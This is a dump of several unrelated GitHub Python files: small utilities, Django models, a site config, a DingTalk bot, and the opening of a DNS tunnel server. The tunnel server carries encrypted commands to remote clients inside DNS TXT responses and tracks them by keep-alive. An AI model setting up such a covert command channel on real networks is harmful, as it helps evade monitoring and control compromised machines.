set_price(self, price):\n        if price >= 10000:\n            self.discount = price * 0.10\n            self.totalprice = price - self.discount\n        else:\n            self.totalprice = price\n        self.price = price\n\n    def __str__(self):\n        receipt = \"\"\"\nTotal: {OriginalPrice} \nDiscount: {Discount}\n-----------------------------------\nAmount due: {TotalPrice} \n\n\n    \"\"\"\n        output = receipt.format(OriginalPrice=self.price, Discount=self.discount, TotalPrice=self.totalprice)\n        return output\n\ndef main():\n    print(\"-------Your store--------\")\n    price = 0\n\n    n = 0\n    while n != \"q\":\n        price += int(n)\n        n = input(\"Enter a price like (5995) and press(q to calculate): \")\n\n    customer = Customer()\n    customer.set_price(price)\n    print(customer)\n\n\nmain()\n\n\n\n\n\n","repo_name":"adambjorgvins/pricelist","sub_path":"pricelist.py","file_name":"pricelist.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"6781644652","text":"# # time module\n# ctime(): build a readable time string from a given timestamp;\n# sleep(): pause the program for n seconds\n# localtime(): get the date and time information.\n# time(): get the current timestamp;\n# import time as t\n# print(t.sleep(1))  # pause for 1 second\n\n# t1 = t.time()  # get the current timestamp\n# print(t1)  # the timestamp is 1692194764.1293414\n\n# t2 = t.sleep(1)  # pause the program for 1 second\n# print(t2)  # paused for 1 second\n\n# print(t.localtime(t.time()))  # get the time struct\n\n# fields can be read via attributes or via indexes\n# def time1():\n#     t3 = t.localtime(t.time())  # get the time info (from the timestamp)\n#     year = t3.tm_year  # year via attribute\n#     mon = t3[1]  # month via index\n#     mday = t3.tm_mday  # day via attribute\n#     print(year, mon, mday)  # 2023, 8\n# time1()  # run the function\n\n# demo\nimport time as t  # import the time module\n\nweek = [\" Mon\", \" Tue\", \" Wed\", \" Thu\", \" Fri\", \" Sat\", \" Sun\"]\nt4 = t.localtime()\nprint(\"Today is\" +
week[t4.tm_wday])\n\n\n\n","repo_name":"tonyfiry/python_getting_started","sub_path":"python/python_file/time.py","file_name":"time.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39292543558","text":"from toy_datasets import *\nimport torch\nimport matplotlib.pyplot as plt\nfrom toy_constants import *\nimport numpy as np\nfrom toy_property import compute_samples_property\nfrom boosting.weighted_loss import WeightedLoss\nfrom sklearn.model_selection import StratifiedShuffleSplit\n\n\ndef get_data_loader(X, y, sampler=None, shuffle=True, num_workers=0):\n \"\"\"\n Generate a DataLoader object given a two numpy arrays.\n :param X: numpy array of samples\n :param y: numpy array of labels\n :param shuffle: if True, shuffle samples\n :param num_workers:\n :return: a DataLoader object initialized with X and y\n \"\"\"\n # y = y.flatten() # Flatten for the DataLoader\n dataset = ToyDataset(X=X, y=y)\n return torch.utils.data.DataLoader(dataset, sampler=sampler, batch_size=BATCH_SIZE, shuffle=shuffle,\n num_workers=num_workers)\n\n\ndef abline(weight1, weight2, bias, label):\n axes = plt.gca()\n slope = -weight1 / weight2\n x_vals = np.array(axes.get_xlim())\n y_vals = -bias / weight2 + slope * x_vals\n plt.plot(x_vals, y_vals, '--', label=label)\n\n\ndef get_params(model):\n # Get the parameters of the model\n params = model.state_dict()\n weight1 = params['f1.weight'][0][0].numpy()\n weight2 = params['f1.weight'][0][1].numpy()\n bias = params['f1.bias'][0].numpy()\n return weight1, weight2, bias\n\n\ndef rotate(X, theta=45.00, ax_1=-1, ax_2=-2):\n theta = np.radians(theta)\n R = np.identity(X.shape[1])\n c, s = np.cos(theta), np.sin(theta)\n R[ax_1][ax_1], R[ax_1][ax_2], R[ax_2][ax_1], R[ax_2][ax_2] = c, s, -s, c\n X_noisy = np.array(np.matmul(X, R))\n return X_noisy\n\n\ndef get_samples_by_property(model, X_train_noisy, y_train, perc, most=True, prop='entropy', diversity=False,\n min_per_class=None, rand_swap=False, rand_perc=0.2, swap_less_informative=True,\n flatten=False):\n \"\"\"\n Compute a subset of the dataset according to a property of the samples and optionally following ad-hoc heuristics.\n :param model: network that performs the classification. Samples are fed into the network to be selected according\n to their classification property\n :param X_train_noisy: numpy array of noisy samples\n :param y_train: numpy array of labels\n :param perc: relative amount of samples you want to retrieve\n :param most: select the samples with the greatest property values, otherwise the ones with the smallest\n :param prop: ['entropy', 'cross_entropy', 'probability', 'first_vs_second']\n :param diversity: apply diversity heuristic, trying to maintain a balanced number of labels in the subset\n :param min_per_class: minimum number of samples that each class must contain in the subset. 
If None, the threshold is\n    computed ad-hoc for each class using the following heuristic: min_per_class_i = int(n_labels_i * perc)\n    :type min_per_class: integer or None\n    :param rand_swap: swap selected elements from the subset with random samples not selected initially\n    :param rand_perc: percentage of the elements to be swapped\n    :param swap_less_informative: if True, swap the elements which have the least entropy (if most=True)\n    or the most entropy (if most=False)\n    :return: X_train_noisy_subset, y_train_noisy_subset: subset of the samples\n    \"\"\"\n    unique_labels = len(np.unique(y_train))\n    indices = compute_samples_property(model, X_train_noisy, y_train, unique_labels, prop, indices=True,\n                                       flatten=flatten)\n    n_samples = int(len(indices) * perc)\n\n    if most:\n        indices = indices[::-1]\n\n    indices_subset = indices[:n_samples]\n\n    if rand_swap:\n        assert 0 <= rand_perc <= 1\n        n_swap_elements = int(len(indices_subset) * rand_perc)\n\n        if swap_less_informative:\n            indices_removed = indices_subset[-n_swap_elements:]\n        else:\n            indices_removed = np.random.choice(indices_subset, size=n_swap_elements, replace=False)\n        not_selected = np.setdiff1d(np.arange(len(indices)), indices_subset)\n        indices_added = np.random.choice(not_selected, size=n_swap_elements, replace=False)\n\n        # Remove old indices and concatenate new indices\n        indices_subset = np.concatenate((np.setdiff1d(indices_subset, indices_removed), indices_added))\n\n    X_train_noisy_subset = X_train_noisy[indices_subset]\n    y_train_subset = y_train[indices_subset]\n    return X_train_noisy_subset, y_train_subset\n\n\ndef get_random_subset(x_train_noisy, y_train, entropy_percentage, return_indices=False):\n    total_len = x_train_noisy.shape[0]\n    subset_len = int(total_len * entropy_percentage)\n    indices = np.random.choice(total_len, subset_len, replace=False)\n    x_train_noisy_subset = x_train_noisy[indices]\n    y_train_subset = y_train[indices]\n\n    if return_indices:\n        return indices\n    else:\n        return x_train_noisy_subset, y_train_subset\n\n\ndef init_exponential_loss(X):\n    weights_boosting = dict()\n    for sample in X:\n        weights_boosting[tuple(sample)] = 1 / len(X)\n    criterion = WeightedLoss(X=X, weights_boosting=weights_boosting,\n                             indices=list(range(len(X))))\n    return criterion, weights_boosting\n\n\ndef dataset_split(X, y, perc=VALIDATION_PERCENTAGE, random_state=RANDOM_SEED, return_data='samples'):\n    \"\"\"\n    Given two arrays of samples and labels X and y, perform a random splitting in train and validation sets.\n    :param X: numpy array of samples\n    :param y: numpy array of labels\n    :param perc: percentage of the validation set\n    :param random_state: random state of the splitter\n    :param return_data: one of 'data_loader', 'samples' or 'indices', selecting the return type\n    :return: (train_loader, val_loader) or (X_train, y_train), (X_val, y_val) or train_idx, val_idx\n    \"\"\"\n    assert 0 <= perc <= 1\n\n    sss = StratifiedShuffleSplit(n_splits=1, test_size=perc, random_state=random_state)\n    train_idxs, valid_idxs = next(sss.split(X, y))\n\n    X_train, X_valid = X[train_idxs], X[valid_idxs]\n    y_train, y_valid = y[train_idxs], y[valid_idxs]\n\n    if return_data == 'data_loader':\n        return get_data_loader(X_train, y_train), get_data_loader(X_valid, y_valid)\n    elif return_data == 'samples':\n        return (X_train, y_train), (X_valid, y_valid)\n    elif return_data == 'indices':\n        return train_idxs, valid_idxs
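\n\n# Usage sketch (illustrative only; array shapes are assumed):\n#   (X_tr, y_tr), (X_va, y_va) = dataset_split(X, y, perc=0.2)\n#   train_loader, val_loader = dataset_split(X, y, return_data='data_loader')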
\n\n\ndef convert_labels(y, old_labels, new_labels):\n    \"\"\"\n    Convert labels of a numpy array using an implicit mapping from old_labels to new_labels.\n    :param y: numpy array of labels\n    :param old_labels: e.g. [0, 1]\n    :param new_labels: e.g. [-1, 1]\n    :return: y_converted\n    \"\"\"\n    assert len(old_labels) == len(new_labels)\n    if set(y) == set(new_labels):\n        return y\n    mapping = dict(zip(old_labels, new_labels))\n    y_converted = [mapping[y_i] for y_i in y]\n    return np.array(y_converted)\n\n\ndef evaluate_ensemble(ensemble, learning_rates, dataloader, device):\n    \"\"\"\n    Evaluate an ensemble of models.\n    :param ensemble: list of trained models\n    :param learning_rates: per-model weights applied to each model's outputs\n    :param dataloader: DataLoader yielding (input, label) batches\n    :return: accuracy over the dataloader\n    \"\"\"\n    total = 0.0\n    correct = 0.0\n    with torch.no_grad():\n        for data in dataloader:\n            # Unwrap tuple\n            input, labels = data\n            # Move to GPU\n            input, labels = input.to(device), labels.to(device)\n            predicted = [0.0] * input.shape[0]\n            for i, model in enumerate(ensemble):\n                # Forward pass\n                outputs = model(input)\n                predicted = predicted + np.array(learning_rates[i]) * outputs.view(-1).tolist()\n            predicted = np.where(predicted > 0, 1, -1)\n            predicted = torch.FloatTensor(predicted)\n            total += labels.size(0)\n            correct += (predicted == labels).sum().item()\n    # Return accuracy\n    return correct / total\n","repo_name":"tmscarla/improving-transfer-learning","sub_path":"image-recognition/toy-model/toy_utils.py","file_name":"toy_utils.py","file_ext":"py","file_size_in_byte":7876,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"}
+{"seq_id":"70183365928","text":"import os\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom django.core.files.uploadedfile import InMemoryUploadedFile\nfrom io import BytesIO\nfrom PIL import Image, ImageSequence\n\n\nclass Company(models.Model):\n    name = models.CharField(max_length=100, unique=True)\n    address = models.CharField(max_length=100, blank=True)\n    phone = models.CharField(max_length=15, blank=True)\n    email = models.EmailField(max_length=254, blank=True)\n    website = models.URLField(max_length=200, blank=True)\n    logo = models.ImageField(default='default_logo.png', upload_to='company_logos')\n\n    max_storage = models.IntegerField(default=(100 * pow(1024, 2))) # store the max storage in bytes\n    used_storage = models.IntegerField(default=0) # store the used storage in bytes\n\n    class Meta:\n        verbose_name_plural = 'companies'\n\n    def __str__(self):\n        return self.name\n\n    def save(self, *args, **kwargs):\n        super().save(*args, **kwargs)\n        img = Image.open(self.logo.path)\n        if img.height > 100 or img.width > 100:\n            output_size = (100, 100)\n            img.thumbnail(output_size)\n            img.save(self.logo.path)\n\n\nclass Profile(models.Model):\n    user = models.OneToOneField(User, on_delete=models.CASCADE)\n    company = models.ForeignKey(Company, on_delete=models.CASCADE, null=True)\n    image = models.ImageField(default='default.jpg', upload_to='profile_pics')\n    phone = models.CharField(max_length=15, default='', 
blank=True)\n    is_company_admin = models.BooleanField(default=False)  # company admin can add users to the company\n    get_backup_emails = models.BooleanField(default=True)  # whether to get backup emails or not\n\n    def __str__(self):\n        return f\"{self.user.username} Profile\"\n\n    def save(self, *args, **kwargs):\n        super().save(*args, **kwargs)\n        img = Image.open(self.image)\n\n        if img.format == 'GIF':\n            # trying to trigger the save method of the image field so that django_cleanups can clean up the old image\n            self.image = self.resize_gif(img)\n\n        elif img.format != 'GIF' and (img.height > 450 or img.width > 450):\n            img_width = img.size[0] if img.size[0] < 450 else 450\n            img_height = img.size[1] if img.size[1] < 450 else 450\n\n            output_size = (img_width, img_height)\n            # Image.ANTIALIAS was removed in Pillow 10; LANCZOS is the same resampling filter\n            img.thumbnail(output_size, Image.LANCZOS)\n            img.save(self.image.path)\n\n\n    def resize_gif(self, img):\n        \"\"\"\n        Resize a gif image by resizing each frame and then reassembling the frames into a new gif\n        \"\"\"\n\n        frame_width = img.size[0] if img.size[0] < 450 else 450\n        frame_height = img.size[1] if img.size[1] < 450 else 450\n\n        if frame_width == img.size[0] and frame_height == img.size[1]:  # if the image is already the correct size\n            return self.image\n\n        frames = []\n        durations = []  # Store frame durations\n        disposal_methods = []  # Store disposal methods\n\n        for frame in ImageSequence.Iterator(img):\n            # Resize the frame\n            frame = frame.resize((frame_width, frame_height), Image.LANCZOS)\n\n            # Extract and store the frame duration and disposal method\n            durations.append(frame.info.get(\"duration\", 100))  # Default duration is 100 ms\n            disposal_methods.append(frame.info.get(\"disposal_method\", 0))  # Default disposal method is 0\n\n            frames.append(frame)\n\n        # Create a new GIF with frame durations and disposal methods\n        with BytesIO() as output_buffer:\n            frames[0].save(\n                output_buffer,\n                format=\"GIF\",\n                save_all=True,\n                append_images=frames[1:],\n                duration=durations,\n                disposal=disposal_methods,\n                loop=img.info.get(\"loop\", 0)  # Copy the loop count from the original\n            )\n\n            buffer = BytesIO(output_buffer.getvalue())\n\n        return InMemoryUploadedFile(\n            buffer,\n            'ImageField',\n            os.path.normpath(self.image.path),\n            'image/gif',\n            buffer.getbuffer().nbytes,\n            None\n        )\n","repo_name":"Fingolfin7/SoftriteAPI","sub_path":"users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27301013073","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\n\nAUTHOR = 'firemark'\nSITENAME = 'Hackerspace Silesia'\nSITEURL = ''\n\nPATH = 'content'\nTHEME = 'Flex'\n\nTIMEZONE = 'Europe/Warsaw'\nPAGE_ORDER_BY = 'date'\n\nDEFAULT_LANG = 'pl'\n\nSITELOGO = '/images/logo.png'\nFAVICON = '/images/favicon.ico'\n\nPAGE_URL = '{slug}/'\nPAGE_SAVE_AS = '{slug}/index.html'\nPAGE_LANG_URL = '{slug}-{lang}/'\nPAGE_LANG_SAVE_AS = '{slug}-{lang}/index.html'\n\nARTICLE_URL = '{slug}/'\nARTICLE_SAVE_AS = '{slug}/index.html'\nARTICLE_LANG_URL = '{slug}-{lang}/'\nARTICLE_LANG_SAVE_AS = '{slug}-{lang}/index.html'\n\nCOPYRIGHT_NAME = '''\nhs-silesia team 2021.\nHosted on \"vultr\"\n'''\n\nHOME_HIDE_TAGS = True\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = \"feeds/atom.xml\"\nFEED_ALL_RSS = \"feeds/rss.xml\"\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\nPLUGINS = 
['jinja2content']\nJINJA2CONTENT_TEMPLATES = ['../templates']\nSTATIC_PATHS = ['extra', 'images']\n\nLINKS = (\n    ('HS wiki', 'https://wiki.hs-silesia.pl/'),\n    ('Planowane spotkania', 'https://wiki.hs-silesia.pl/wiki/Planowane_spotkania'),\n    ('Finanse', 'http://finanse.hs-silesia.pl/'),\n    ('E-mail do zarządu', 'mailto:info@hs-silesia.pl'),\n    ('Grupa dyskusyjna', 'https://lists.hs-silesia.pl/archives/open/'),\n)\n\nSOCIAL = (\n    ('facebook', 'https://www.facebook.com/HackerspaceSilesia'),\n    ('twitter', 'https://twitter.com/hs_silesia'),\n    ('github', 'https://github.com/hackerspace-silesia'),\n    ('envelope', 'mailto:info@hs-silesia.pl'),\n)\n\nDEFAULT_PAGINATION = False\n\nMARKDOWN = {\n    'extension_configs': {\n        'markdown.extensions.toc': {},\n        'markdown.extensions.admonition': {},\n        'markdown.extensions.codehilite': {'css_class': 'highlight'},\n        'markdown.extensions.extra': {},\n        'markdown.extensions.meta': {},\n    },\n    'output_format': 'html5',\n}\nCUSTOM_CSS = 'extra/custom.css'\nEXTRA_PATH_METADATA = {\n    'images/favicon.ico': {'path': 'favicon.ico'},\n}\n","repo_name":"hackerspace-silesia/new-site","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29556849764","text":"# coding = utf-8\n__AUTHOR__ = 'Abdul Somat Budiaji'\n\nimport os\nimport zipfile\n\nimport config\n\nclass Zipper(object):\n\n    \"\"\"\n    The Zipper class\n    \"\"\"\n\n    def __init__(self, time_0, time_1, tipe='auto'):\n\n        self.time_0 = time_0\n        self.time_1 = time_1\n\n        self.path = config.Path(time_0, time_1, tipe=tipe)\n\n    def zip_result(self):\n\n        \"\"\"\n        Pack the hazard and impact directories into a zip file inside the\n        report folder\n        \"\"\"\n\n        # directory\n        shape_impact_dir = self.path.shp_impact_dir\n        shape_hazard_dir = self.path.shp_hazard_dir\n\n        # hazard and impact dir (input)\n        # dir_impact = shape_impact_dir + self.time_1\n        # dir_hazard = shape_hazard_dir + self.time_1\n\n        ## shapefile output\n        zip_file = self.path.output_dir + 'shapefile_' + \\\n            self.time_0 + '_' + self.time_1 + '.zip'\n        o_zip = zipfile.ZipFile(zip_file, 'w')\n        \n        for file in os.listdir(self.path.shp_hazard_dir):\n            # print os.path.join(self.path.shp_hazard_dir, file)\n            path = os.path.join(self.path.shp_hazard_dir, file)\n            if os.path.isfile(path):\n                o_zip.write(path, arcname=file)\n        \n        for file in os.listdir(self.path.shp_impact_dir):\n            # print os.path.join(self.path.shp_impact_dir, file)\n            path = os.path.join(self.path.shp_impact_dir, file)\n            if os.path.isfile(path):\n                o_zip.write(path, arcname=file)\n\n        o_zip.close()\n        \n        ## calculation csv output\n        calc_zip_file = self.path.output_dir + 'calculation_' + \\\n            self.time_0 + '_' + self.time_1 + '.zip'\n        calc_o_zip = zipfile.ZipFile(calc_zip_file, 'w')\n        \n        for file in os.listdir(self.path.summary_dir):\n            path = os.path.join(self.path.summary_dir, file)\n            if os.path.isfile(path) and path.lower().endswith(('.csv')):\n                calc_o_zip.write(path, arcname=file)\n        \n        ## dala_csv_filename = 'dala_' + self.time_0 + '_' + self.time_1 + '.csv'\n        ## calc_o_zip.write(os.path.join(self.path.output_dir, dala_csv_filename), arcname=file)\n        \n        for file in os.listdir(self.path.output_dir):\n            path = os.path.join(self.path.output_dir, file)\n            if os.path.isfile(path) and path.lower().endswith(('.csv')):\n                calc_o_zip.write(path, arcname=file)\n        \n        
calc_o_zip.close()","repo_name":"frzdian/jaksafe-engine","sub_path":"jaksafe/jaksafe/jakservice/post_processing/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75368630888","text":"import configparser\nimport os\nimport time\nimport hmac\nimport hashlib\nimport base64\nimport urllib.parse\nimport requests,json\n\nclass ding_robot:\n    def __init__(self):\n        self.config = configparser.RawConfigParser()\n        parent_dir = os.path.dirname(os.path.abspath(__file__))\n        self.config.read(os.path.join(parent_dir,'conf/Ding.ini'))\n        robots = eval(self.config.get('common','names'))\n        robot_dict = {'sample_robot':{'access_token':'123','secret':'112233'}}\n        for robot in robots:\n            robot_dict[robot] = {}  # create the entry first, otherwise robots read from the config raise a KeyError\n            robot_dict[robot]['access_token'] = self.config.get(robot, 'access_token')\n            robot_dict[robot]['secret'] = self.config.get(robot, 'secret')\n        self.robot_dict = robot_dict\n\n\n    def get_sign(self, secret):\n        timestamp = str(round(time.time() * 1000))\n        secret_enc = secret.encode('utf-8')\n        string_to_sign = '{}\\n{}'.format(timestamp, secret)\n        string_to_sign_enc = string_to_sign.encode('utf-8')\n        hmac_code = hmac.new(secret_enc, string_to_sign_enc, digestmod=hashlib.sha256).digest()\n        sign = urllib.parse.quote(base64.b64encode(hmac_code))\n        return sign\n\n    def push_message(self,robot,message):\n        robot_info = self.robot_dict[robot]\n        sign = self.get_sign(robot_info['secret'])\n        timestamp = str(round(time.time() * 1000))\n        headers={'Content-Type': 'application/json'} # JSON content type\n        webhook = f'https://oapi.dingtalk.com/robot/send?access_token={robot_info[\"access_token\"]}&timestamp='+timestamp+\"&sign=\"+sign\n        data = {\n            \"msgtype\": \"text\",\n            \"text\": {\"content\": f'{message}'},\n            \"isAtAll\": True}\n        res = requests.post(webhook, data=json.dumps(data), headers=headers) # send the POST request","repo_name":"jsntcheng/SVAM","sub_path":"api_server/message/ding_talk.py","file_name":"ding_talk.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"4965988802","text":"import os\nimport asyncio\nfrom subprocess import check_output\nfrom scapy.all import DNS, DNSQR, DNSRR, raw\nimport weakref\nimport json\nfrom collections import OrderedDict\nfrom struct import Struct\nimport random\nimport time\nfrom datetime import datetime\nimport stat\nimport shutil\nimport sys\nfrom copy import deepcopy\nimport hashlib\nimport toml\nfrom cryptography.hazmat.backends import default_backend as crypto_default_backend\nfrom cryptography.hazmat.primitives.asymmetric import padding as crypto_padding\nfrom cryptography.hazmat.primitives import serialization as crypto_serialization, hashes as crypto_hashes\n\nfrom .helpers import get_logger, PYTHON_GREATER_37\nfrom .message import MessageBuilder\n\nlogger = None\nPATH_CONFIG = 'pydnst.toml'\n\nRESPOND_TO_KEEP_ALIVE = True\nRESPOND_ACK_TO_FRAGMENTS = True #True\nSERVER_SENDS_RSA_KEY_HASH_CONFIRMATION = False #True\nSERVER_SENDS_RSA_KEY_HASH_CONFIRMATION = SERVER_SENDS_RSA_KEY_HASH_CONFIRMATION and RESPOND_ACK_TO_FRAGMENTS\n\nMSG_2_STRUCT = Struct('H') #2 bytes\nKA_COMMAND_ID = '0' #keep-alive command_id is 0\nRSA_COMMAND_ID = '1'\nACK_COMMAND_ID = '2'\nCOMMANDS_WITHOUT_ENCRYPTION = (KA_COMMAND_ID, RSA_COMMAND_ID, ACK_COMMAND_ID)\nCOMMANDS_WITHOUT_ACK = (KA_COMMAND_ID, ACK_COMMAND_ID) #with REQUEST_NEXT_FROM_SERVER and REQUEST_RSA_KEY_HASH_FROM_SERVER\nMIN_COMMAND_ID = 
3\n\nREQUEST_NEXT_FROM_SERVER = b'nextpls'\nREQUEST_RSA_KEY_HASH_FROM_SERVER = b'cfrmpls'\n\n\nclass DnstServerProtocol(asyncio.DatagramProtocol):\n def __init__(self, tunnel_messages, tunnel_mng_messages, store_ordered_tunnel_messages, pending_fragments_to_send_events,\n server_private_key, shared_keys, DNST_SERVER_NAME, FILTERED_QUERY_NAMES, DEFAULT_SHARED_KEY):\n self.loop = asyncio.get_event_loop()\n self.is_server = True \n self.dnst_id = '0'\n self.transport = None\n self.DNST_SERVER_NAME = DNST_SERVER_NAME\n self.FILTERED_QUERY_NAMES = FILTERED_QUERY_NAMES\n self.DEFAULT_SHARED_KEY = DEFAULT_SHARED_KEY\n self.message_builder = MessageBuilder(logger, weakref.proxy(self), self.DNST_SERVER_NAME, self.DEFAULT_SHARED_KEY)\n self.max_data_length = self.message_builder.max_data_length['response'] \n if self.message_builder.max_fragment_payload_sizes['response']['TXT'] < 1:\n logger.error(f'Cannot work with too long domain name {self.DNST_SERVER_NAME}') \n sys.exit(1)\n #we enforce keep-alive to be only 1 fragment, by limiting the client_details size\n self.received_fragments = {} # {client_id : {command_id : {'date':'', 'list_of_fragments':[]} } , }\n #tunnel_messages stored in MESSAGES_JSON : \n #{client_id : {command_id : {'command_awaiting_ka | command_sent' : '', 'date' : '', 'response' : ''} }, }\n self.tunnel_messages, self.store_ordered_tunnel_messages = tunnel_messages , store_ordered_tunnel_messages\n self.pending_fragments_to_send_events = pending_fragments_to_send_events\n self.server_private_key, self.shared_keys = server_private_key, shared_keys\n self.tunnel_mng_messages = tunnel_mng_messages\n \n \n def connection_made(self, transport):\n self.peername = transport.get_extra_info('peername')\n if self.peername:\n logger.info(f'connection_made from : {self.peername}')\n self.transport = transport\n super().connection_made(transport)\n\n def datagram_received(self, data, addr):\n try:\n self.remote_address, self.remote_port = self.peername = addr\n logger.debug(f'datagram_received from {self.peername} : {data}')\n super().datagram_received(data, addr)\n data_scapy = DNS(data)\n qname_scapy = data_scapy.qd.qname\n if qname_scapy.rstrip(b'.') in self.FILTERED_QUERY_NAMES:\n return \n if self.DNST_SERVER_NAME not in qname_scapy:\n return\n logger.info(f'datagram_received from {self.peername} : {data}') \n logger.debug(f'Parsed datagram received : {DNS(data).show(dump=True)}')\n res = self.message_builder.reassemble_fragment(qname_scapy)\n if res is False:\n return\n \n client_id, command_id, fragment_id, number_of_fragments, is_ready = res\n if RESPOND_ACK_TO_FRAGMENTS: \n if command_id not in COMMANDS_WITHOUT_ACK:\n #event_desc = self.pending_fragments_to_send_events.get(client_id, {}).get(command_id, None)\n #if event_desc:\n # logger.info(f'During sending of pending fragments : Not responding ack to non last fragment {is_ready} for client {client_id} and command {command_id}')\n # self.received_fragments[client_id].pop(command_id, None)\n ## self.send_next_fragment(client_id, command_id, 'TXT', addr, data_scapy)\n # return\n send_ack = True\n message_entry = self.tunnel_mng_messages.get(command_id, {}).get(client_id, None)\n if message_entry:\n if message_entry.startswith(REQUEST_NEXT_FROM_SERVER):\n logger.info(f'tunnel_mng_messages : Not sending ack to a REQUEST_NEXT_FROM_SERVER to fragment {fragment_id} out of {number_of_fragments} for client {client_id} and command {command_id}') \n send_ack = False\n elif message_entry.startswith(REQUEST_RSA_KEY_HASH_FROM_SERVER): \n 
logger.info(f'tunnel_mng_messages : Not sending ack to a REQUEST_RSA_KEY_HASH_FROM_SERVER to fragment {fragment_id} out of {number_of_fragments} for client {client_id} and command {command_id}')\n send_ack = False\n message_entry = self.tunnel_messages.get(client_id, {}).get(command_id, {}).get('command_sent', None)\n if message_entry:\n if message_entry.encode().startswith(REQUEST_NEXT_FROM_SERVER):\n logger.info(f'tunnel_messages : Not sending ack to a REQUEST_NEXT_FROM_SERVER to fragment {fragment_id} out of {number_of_fragments} for client {client_id} and command {command_id}') \n send_ack = False\n elif message_entry.encode().startswith(REQUEST_RSA_KEY_HASH_FROM_SERVER): \n logger.info(f'tunnel_messages : Not sending ack to a REQUEST_RSA_KEY_HASH_FROM_SERVER to fragment {fragment_id} out of {number_of_fragments} for client {client_id} and command {command_id}')\n send_ack = False \n if send_ack: \n logger.info(f'Responding ack to fragment {fragment_id} out of {number_of_fragments} for client {client_id} and command {command_id}') \n ack_response = str(fragment_id) + '-' + str(random.randint(1,256)) #send ack with the fragment index in is_ready\n self.send_data(ack_response.encode(), ACK_COMMAND_ID, client_id, addr,\n rtype='TXT', data_scapy=data_scapy) \n if is_ready is not True: \n return\n if self.server_private_key:\n if command_id in (RSA_COMMAND_ID, ACK_COMMAND_ID):\n message_entry = self.tunnel_mng_messages[command_id].pop(client_id, b'')\n if message_entry:\n if message_entry.startswith(REQUEST_RSA_KEY_HASH_FROM_SERVER):\n if SERVER_SENDS_RSA_KEY_HASH_CONFIRMATION:\n hasher = hashlib.sha256()\n hasher.update(self.shared_keys[client_id])\n shared_key_hash = hasher.digest()\n logger.info(f'Sending shared_key hash response for client {client_id}')\n shared_key_hash_response = self.server_private_key.sign(\n shared_key_hash,\n crypto_padding.PSS(\n mgf=crypto_padding.MGF1(crypto_hashes.SHA256()),\n salt_length=crypto_padding.PSS.MAX_LENGTH\n ),\n crypto_hashes.SHA256()\n ) \n self.send_data(shared_key_hash_response, RSA_COMMAND_ID, client_id, addr,\n rtype='TXT', data_scapy=data_scapy)\n return\n elif command_id == RSA_COMMAND_ID: \n if message_entry.startswith(REQUEST_NEXT_FROM_SERVER):\n event_desc = self.pending_fragments_to_send_events.get(client_id, {}).get(command_id, None) \n if event_desc:\n try:\n fragment_acked = int(message_entry.split(b'-')[1])\n except Exception:\n logger.exception(f'Invalid REQUEST_NEXT_FROM_SERVER content received from client {client_id} : {message_entry}')\n return\n logger.info(f'Received request from client {client_id} and command {command_id} to send next rsa fragment, after fragment {fragment_acked} was acked') \n self.send_next_fragment(client_id, command_id, fragment_acked, 'TXT', addr, data_scapy)\n else:\n logger.info(f'Received request from client {client_id} and command {command_id} to send next rsa fragment, but no pending fragment')\n return\n logger.info(f'Received shared_key for client {client_id}, decrypting it')\n self.shared_keys[client_id] = self.server_private_key.decrypt(\n message_entry,\n crypto_padding.OAEP(\n mgf=crypto_padding.MGF1(algorithm=crypto_hashes.SHA256()),\n algorithm=crypto_hashes.SHA256(),\n label=None\n ))\n \n self.message_builder.use_shared_key_for_client(client_id, self.shared_keys[client_id])\n return\n elif client_id not in self.shared_keys:\n logger.info(f'Received command {command_id} from client {client_id} without having a shared_key for that client, asking one...')\n hasher = hashlib.sha256()\n 
hasher.update(b'Asking for a shared_key') #dummy error message, anything different from the real shared_key_hash will lead the client to send it again\n                ask_for_shared_key = hasher.digest() \n                server_response = self.server_private_key.sign(\n                    ask_for_shared_key,\n                    crypto_padding.PSS(\n                        mgf=crypto_padding.MGF1(crypto_hashes.SHA256()),\n                        salt_length=crypto_padding.PSS.MAX_LENGTH\n                    ),\n                    crypto_hashes.SHA256()\n                )                \n                self.send_data(server_response, RSA_COMMAND_ID, client_id, addr,\n                                rtype='TXT', data_scapy=data_scapy)\n                return                \n            \n            tunnel_messages = self.tunnel_messages[client_id]\n            if command_id == KA_COMMAND_ID:\n                logger.info(f'Received keep-alive from {client_id}, with transaction id {data_scapy.id}, and name {qname_scapy}')\n                #check if there is a command to send for this client\n                for cmd_id in tunnel_messages:\n                    if cmd_id != KA_COMMAND_ID and (tunnel_messages[cmd_id].get('command_awaiting_ka') or ( tunnel_messages[cmd_id].get('command_sent') and not tunnel_messages[cmd_id].get('response'))):\n                        command_to_send = tunnel_messages[cmd_id].pop('command_awaiting_ka', None)\n                        if command_to_send is None:\n                            #this can happen with weird dns servers sending cached requests with delay\n                            command_to_send = tunnel_messages[cmd_id]['command_sent']\n                            logger.info(f'Trying to send again command {cmd_id} : {command_to_send}')                            \n                        logger.info(f'There is a command to send to this client {client_id} : {command_to_send}')\n                        tunnel_messages[cmd_id]['command_sent'] = command_to_send\n                        self.store_ordered_tunnel_messages(self.tunnel_messages)\n                        self.send_data(command_to_send.encode(), cmd_id, client_id, addr, rtype='TXT', data_scapy=data_scapy)\n                        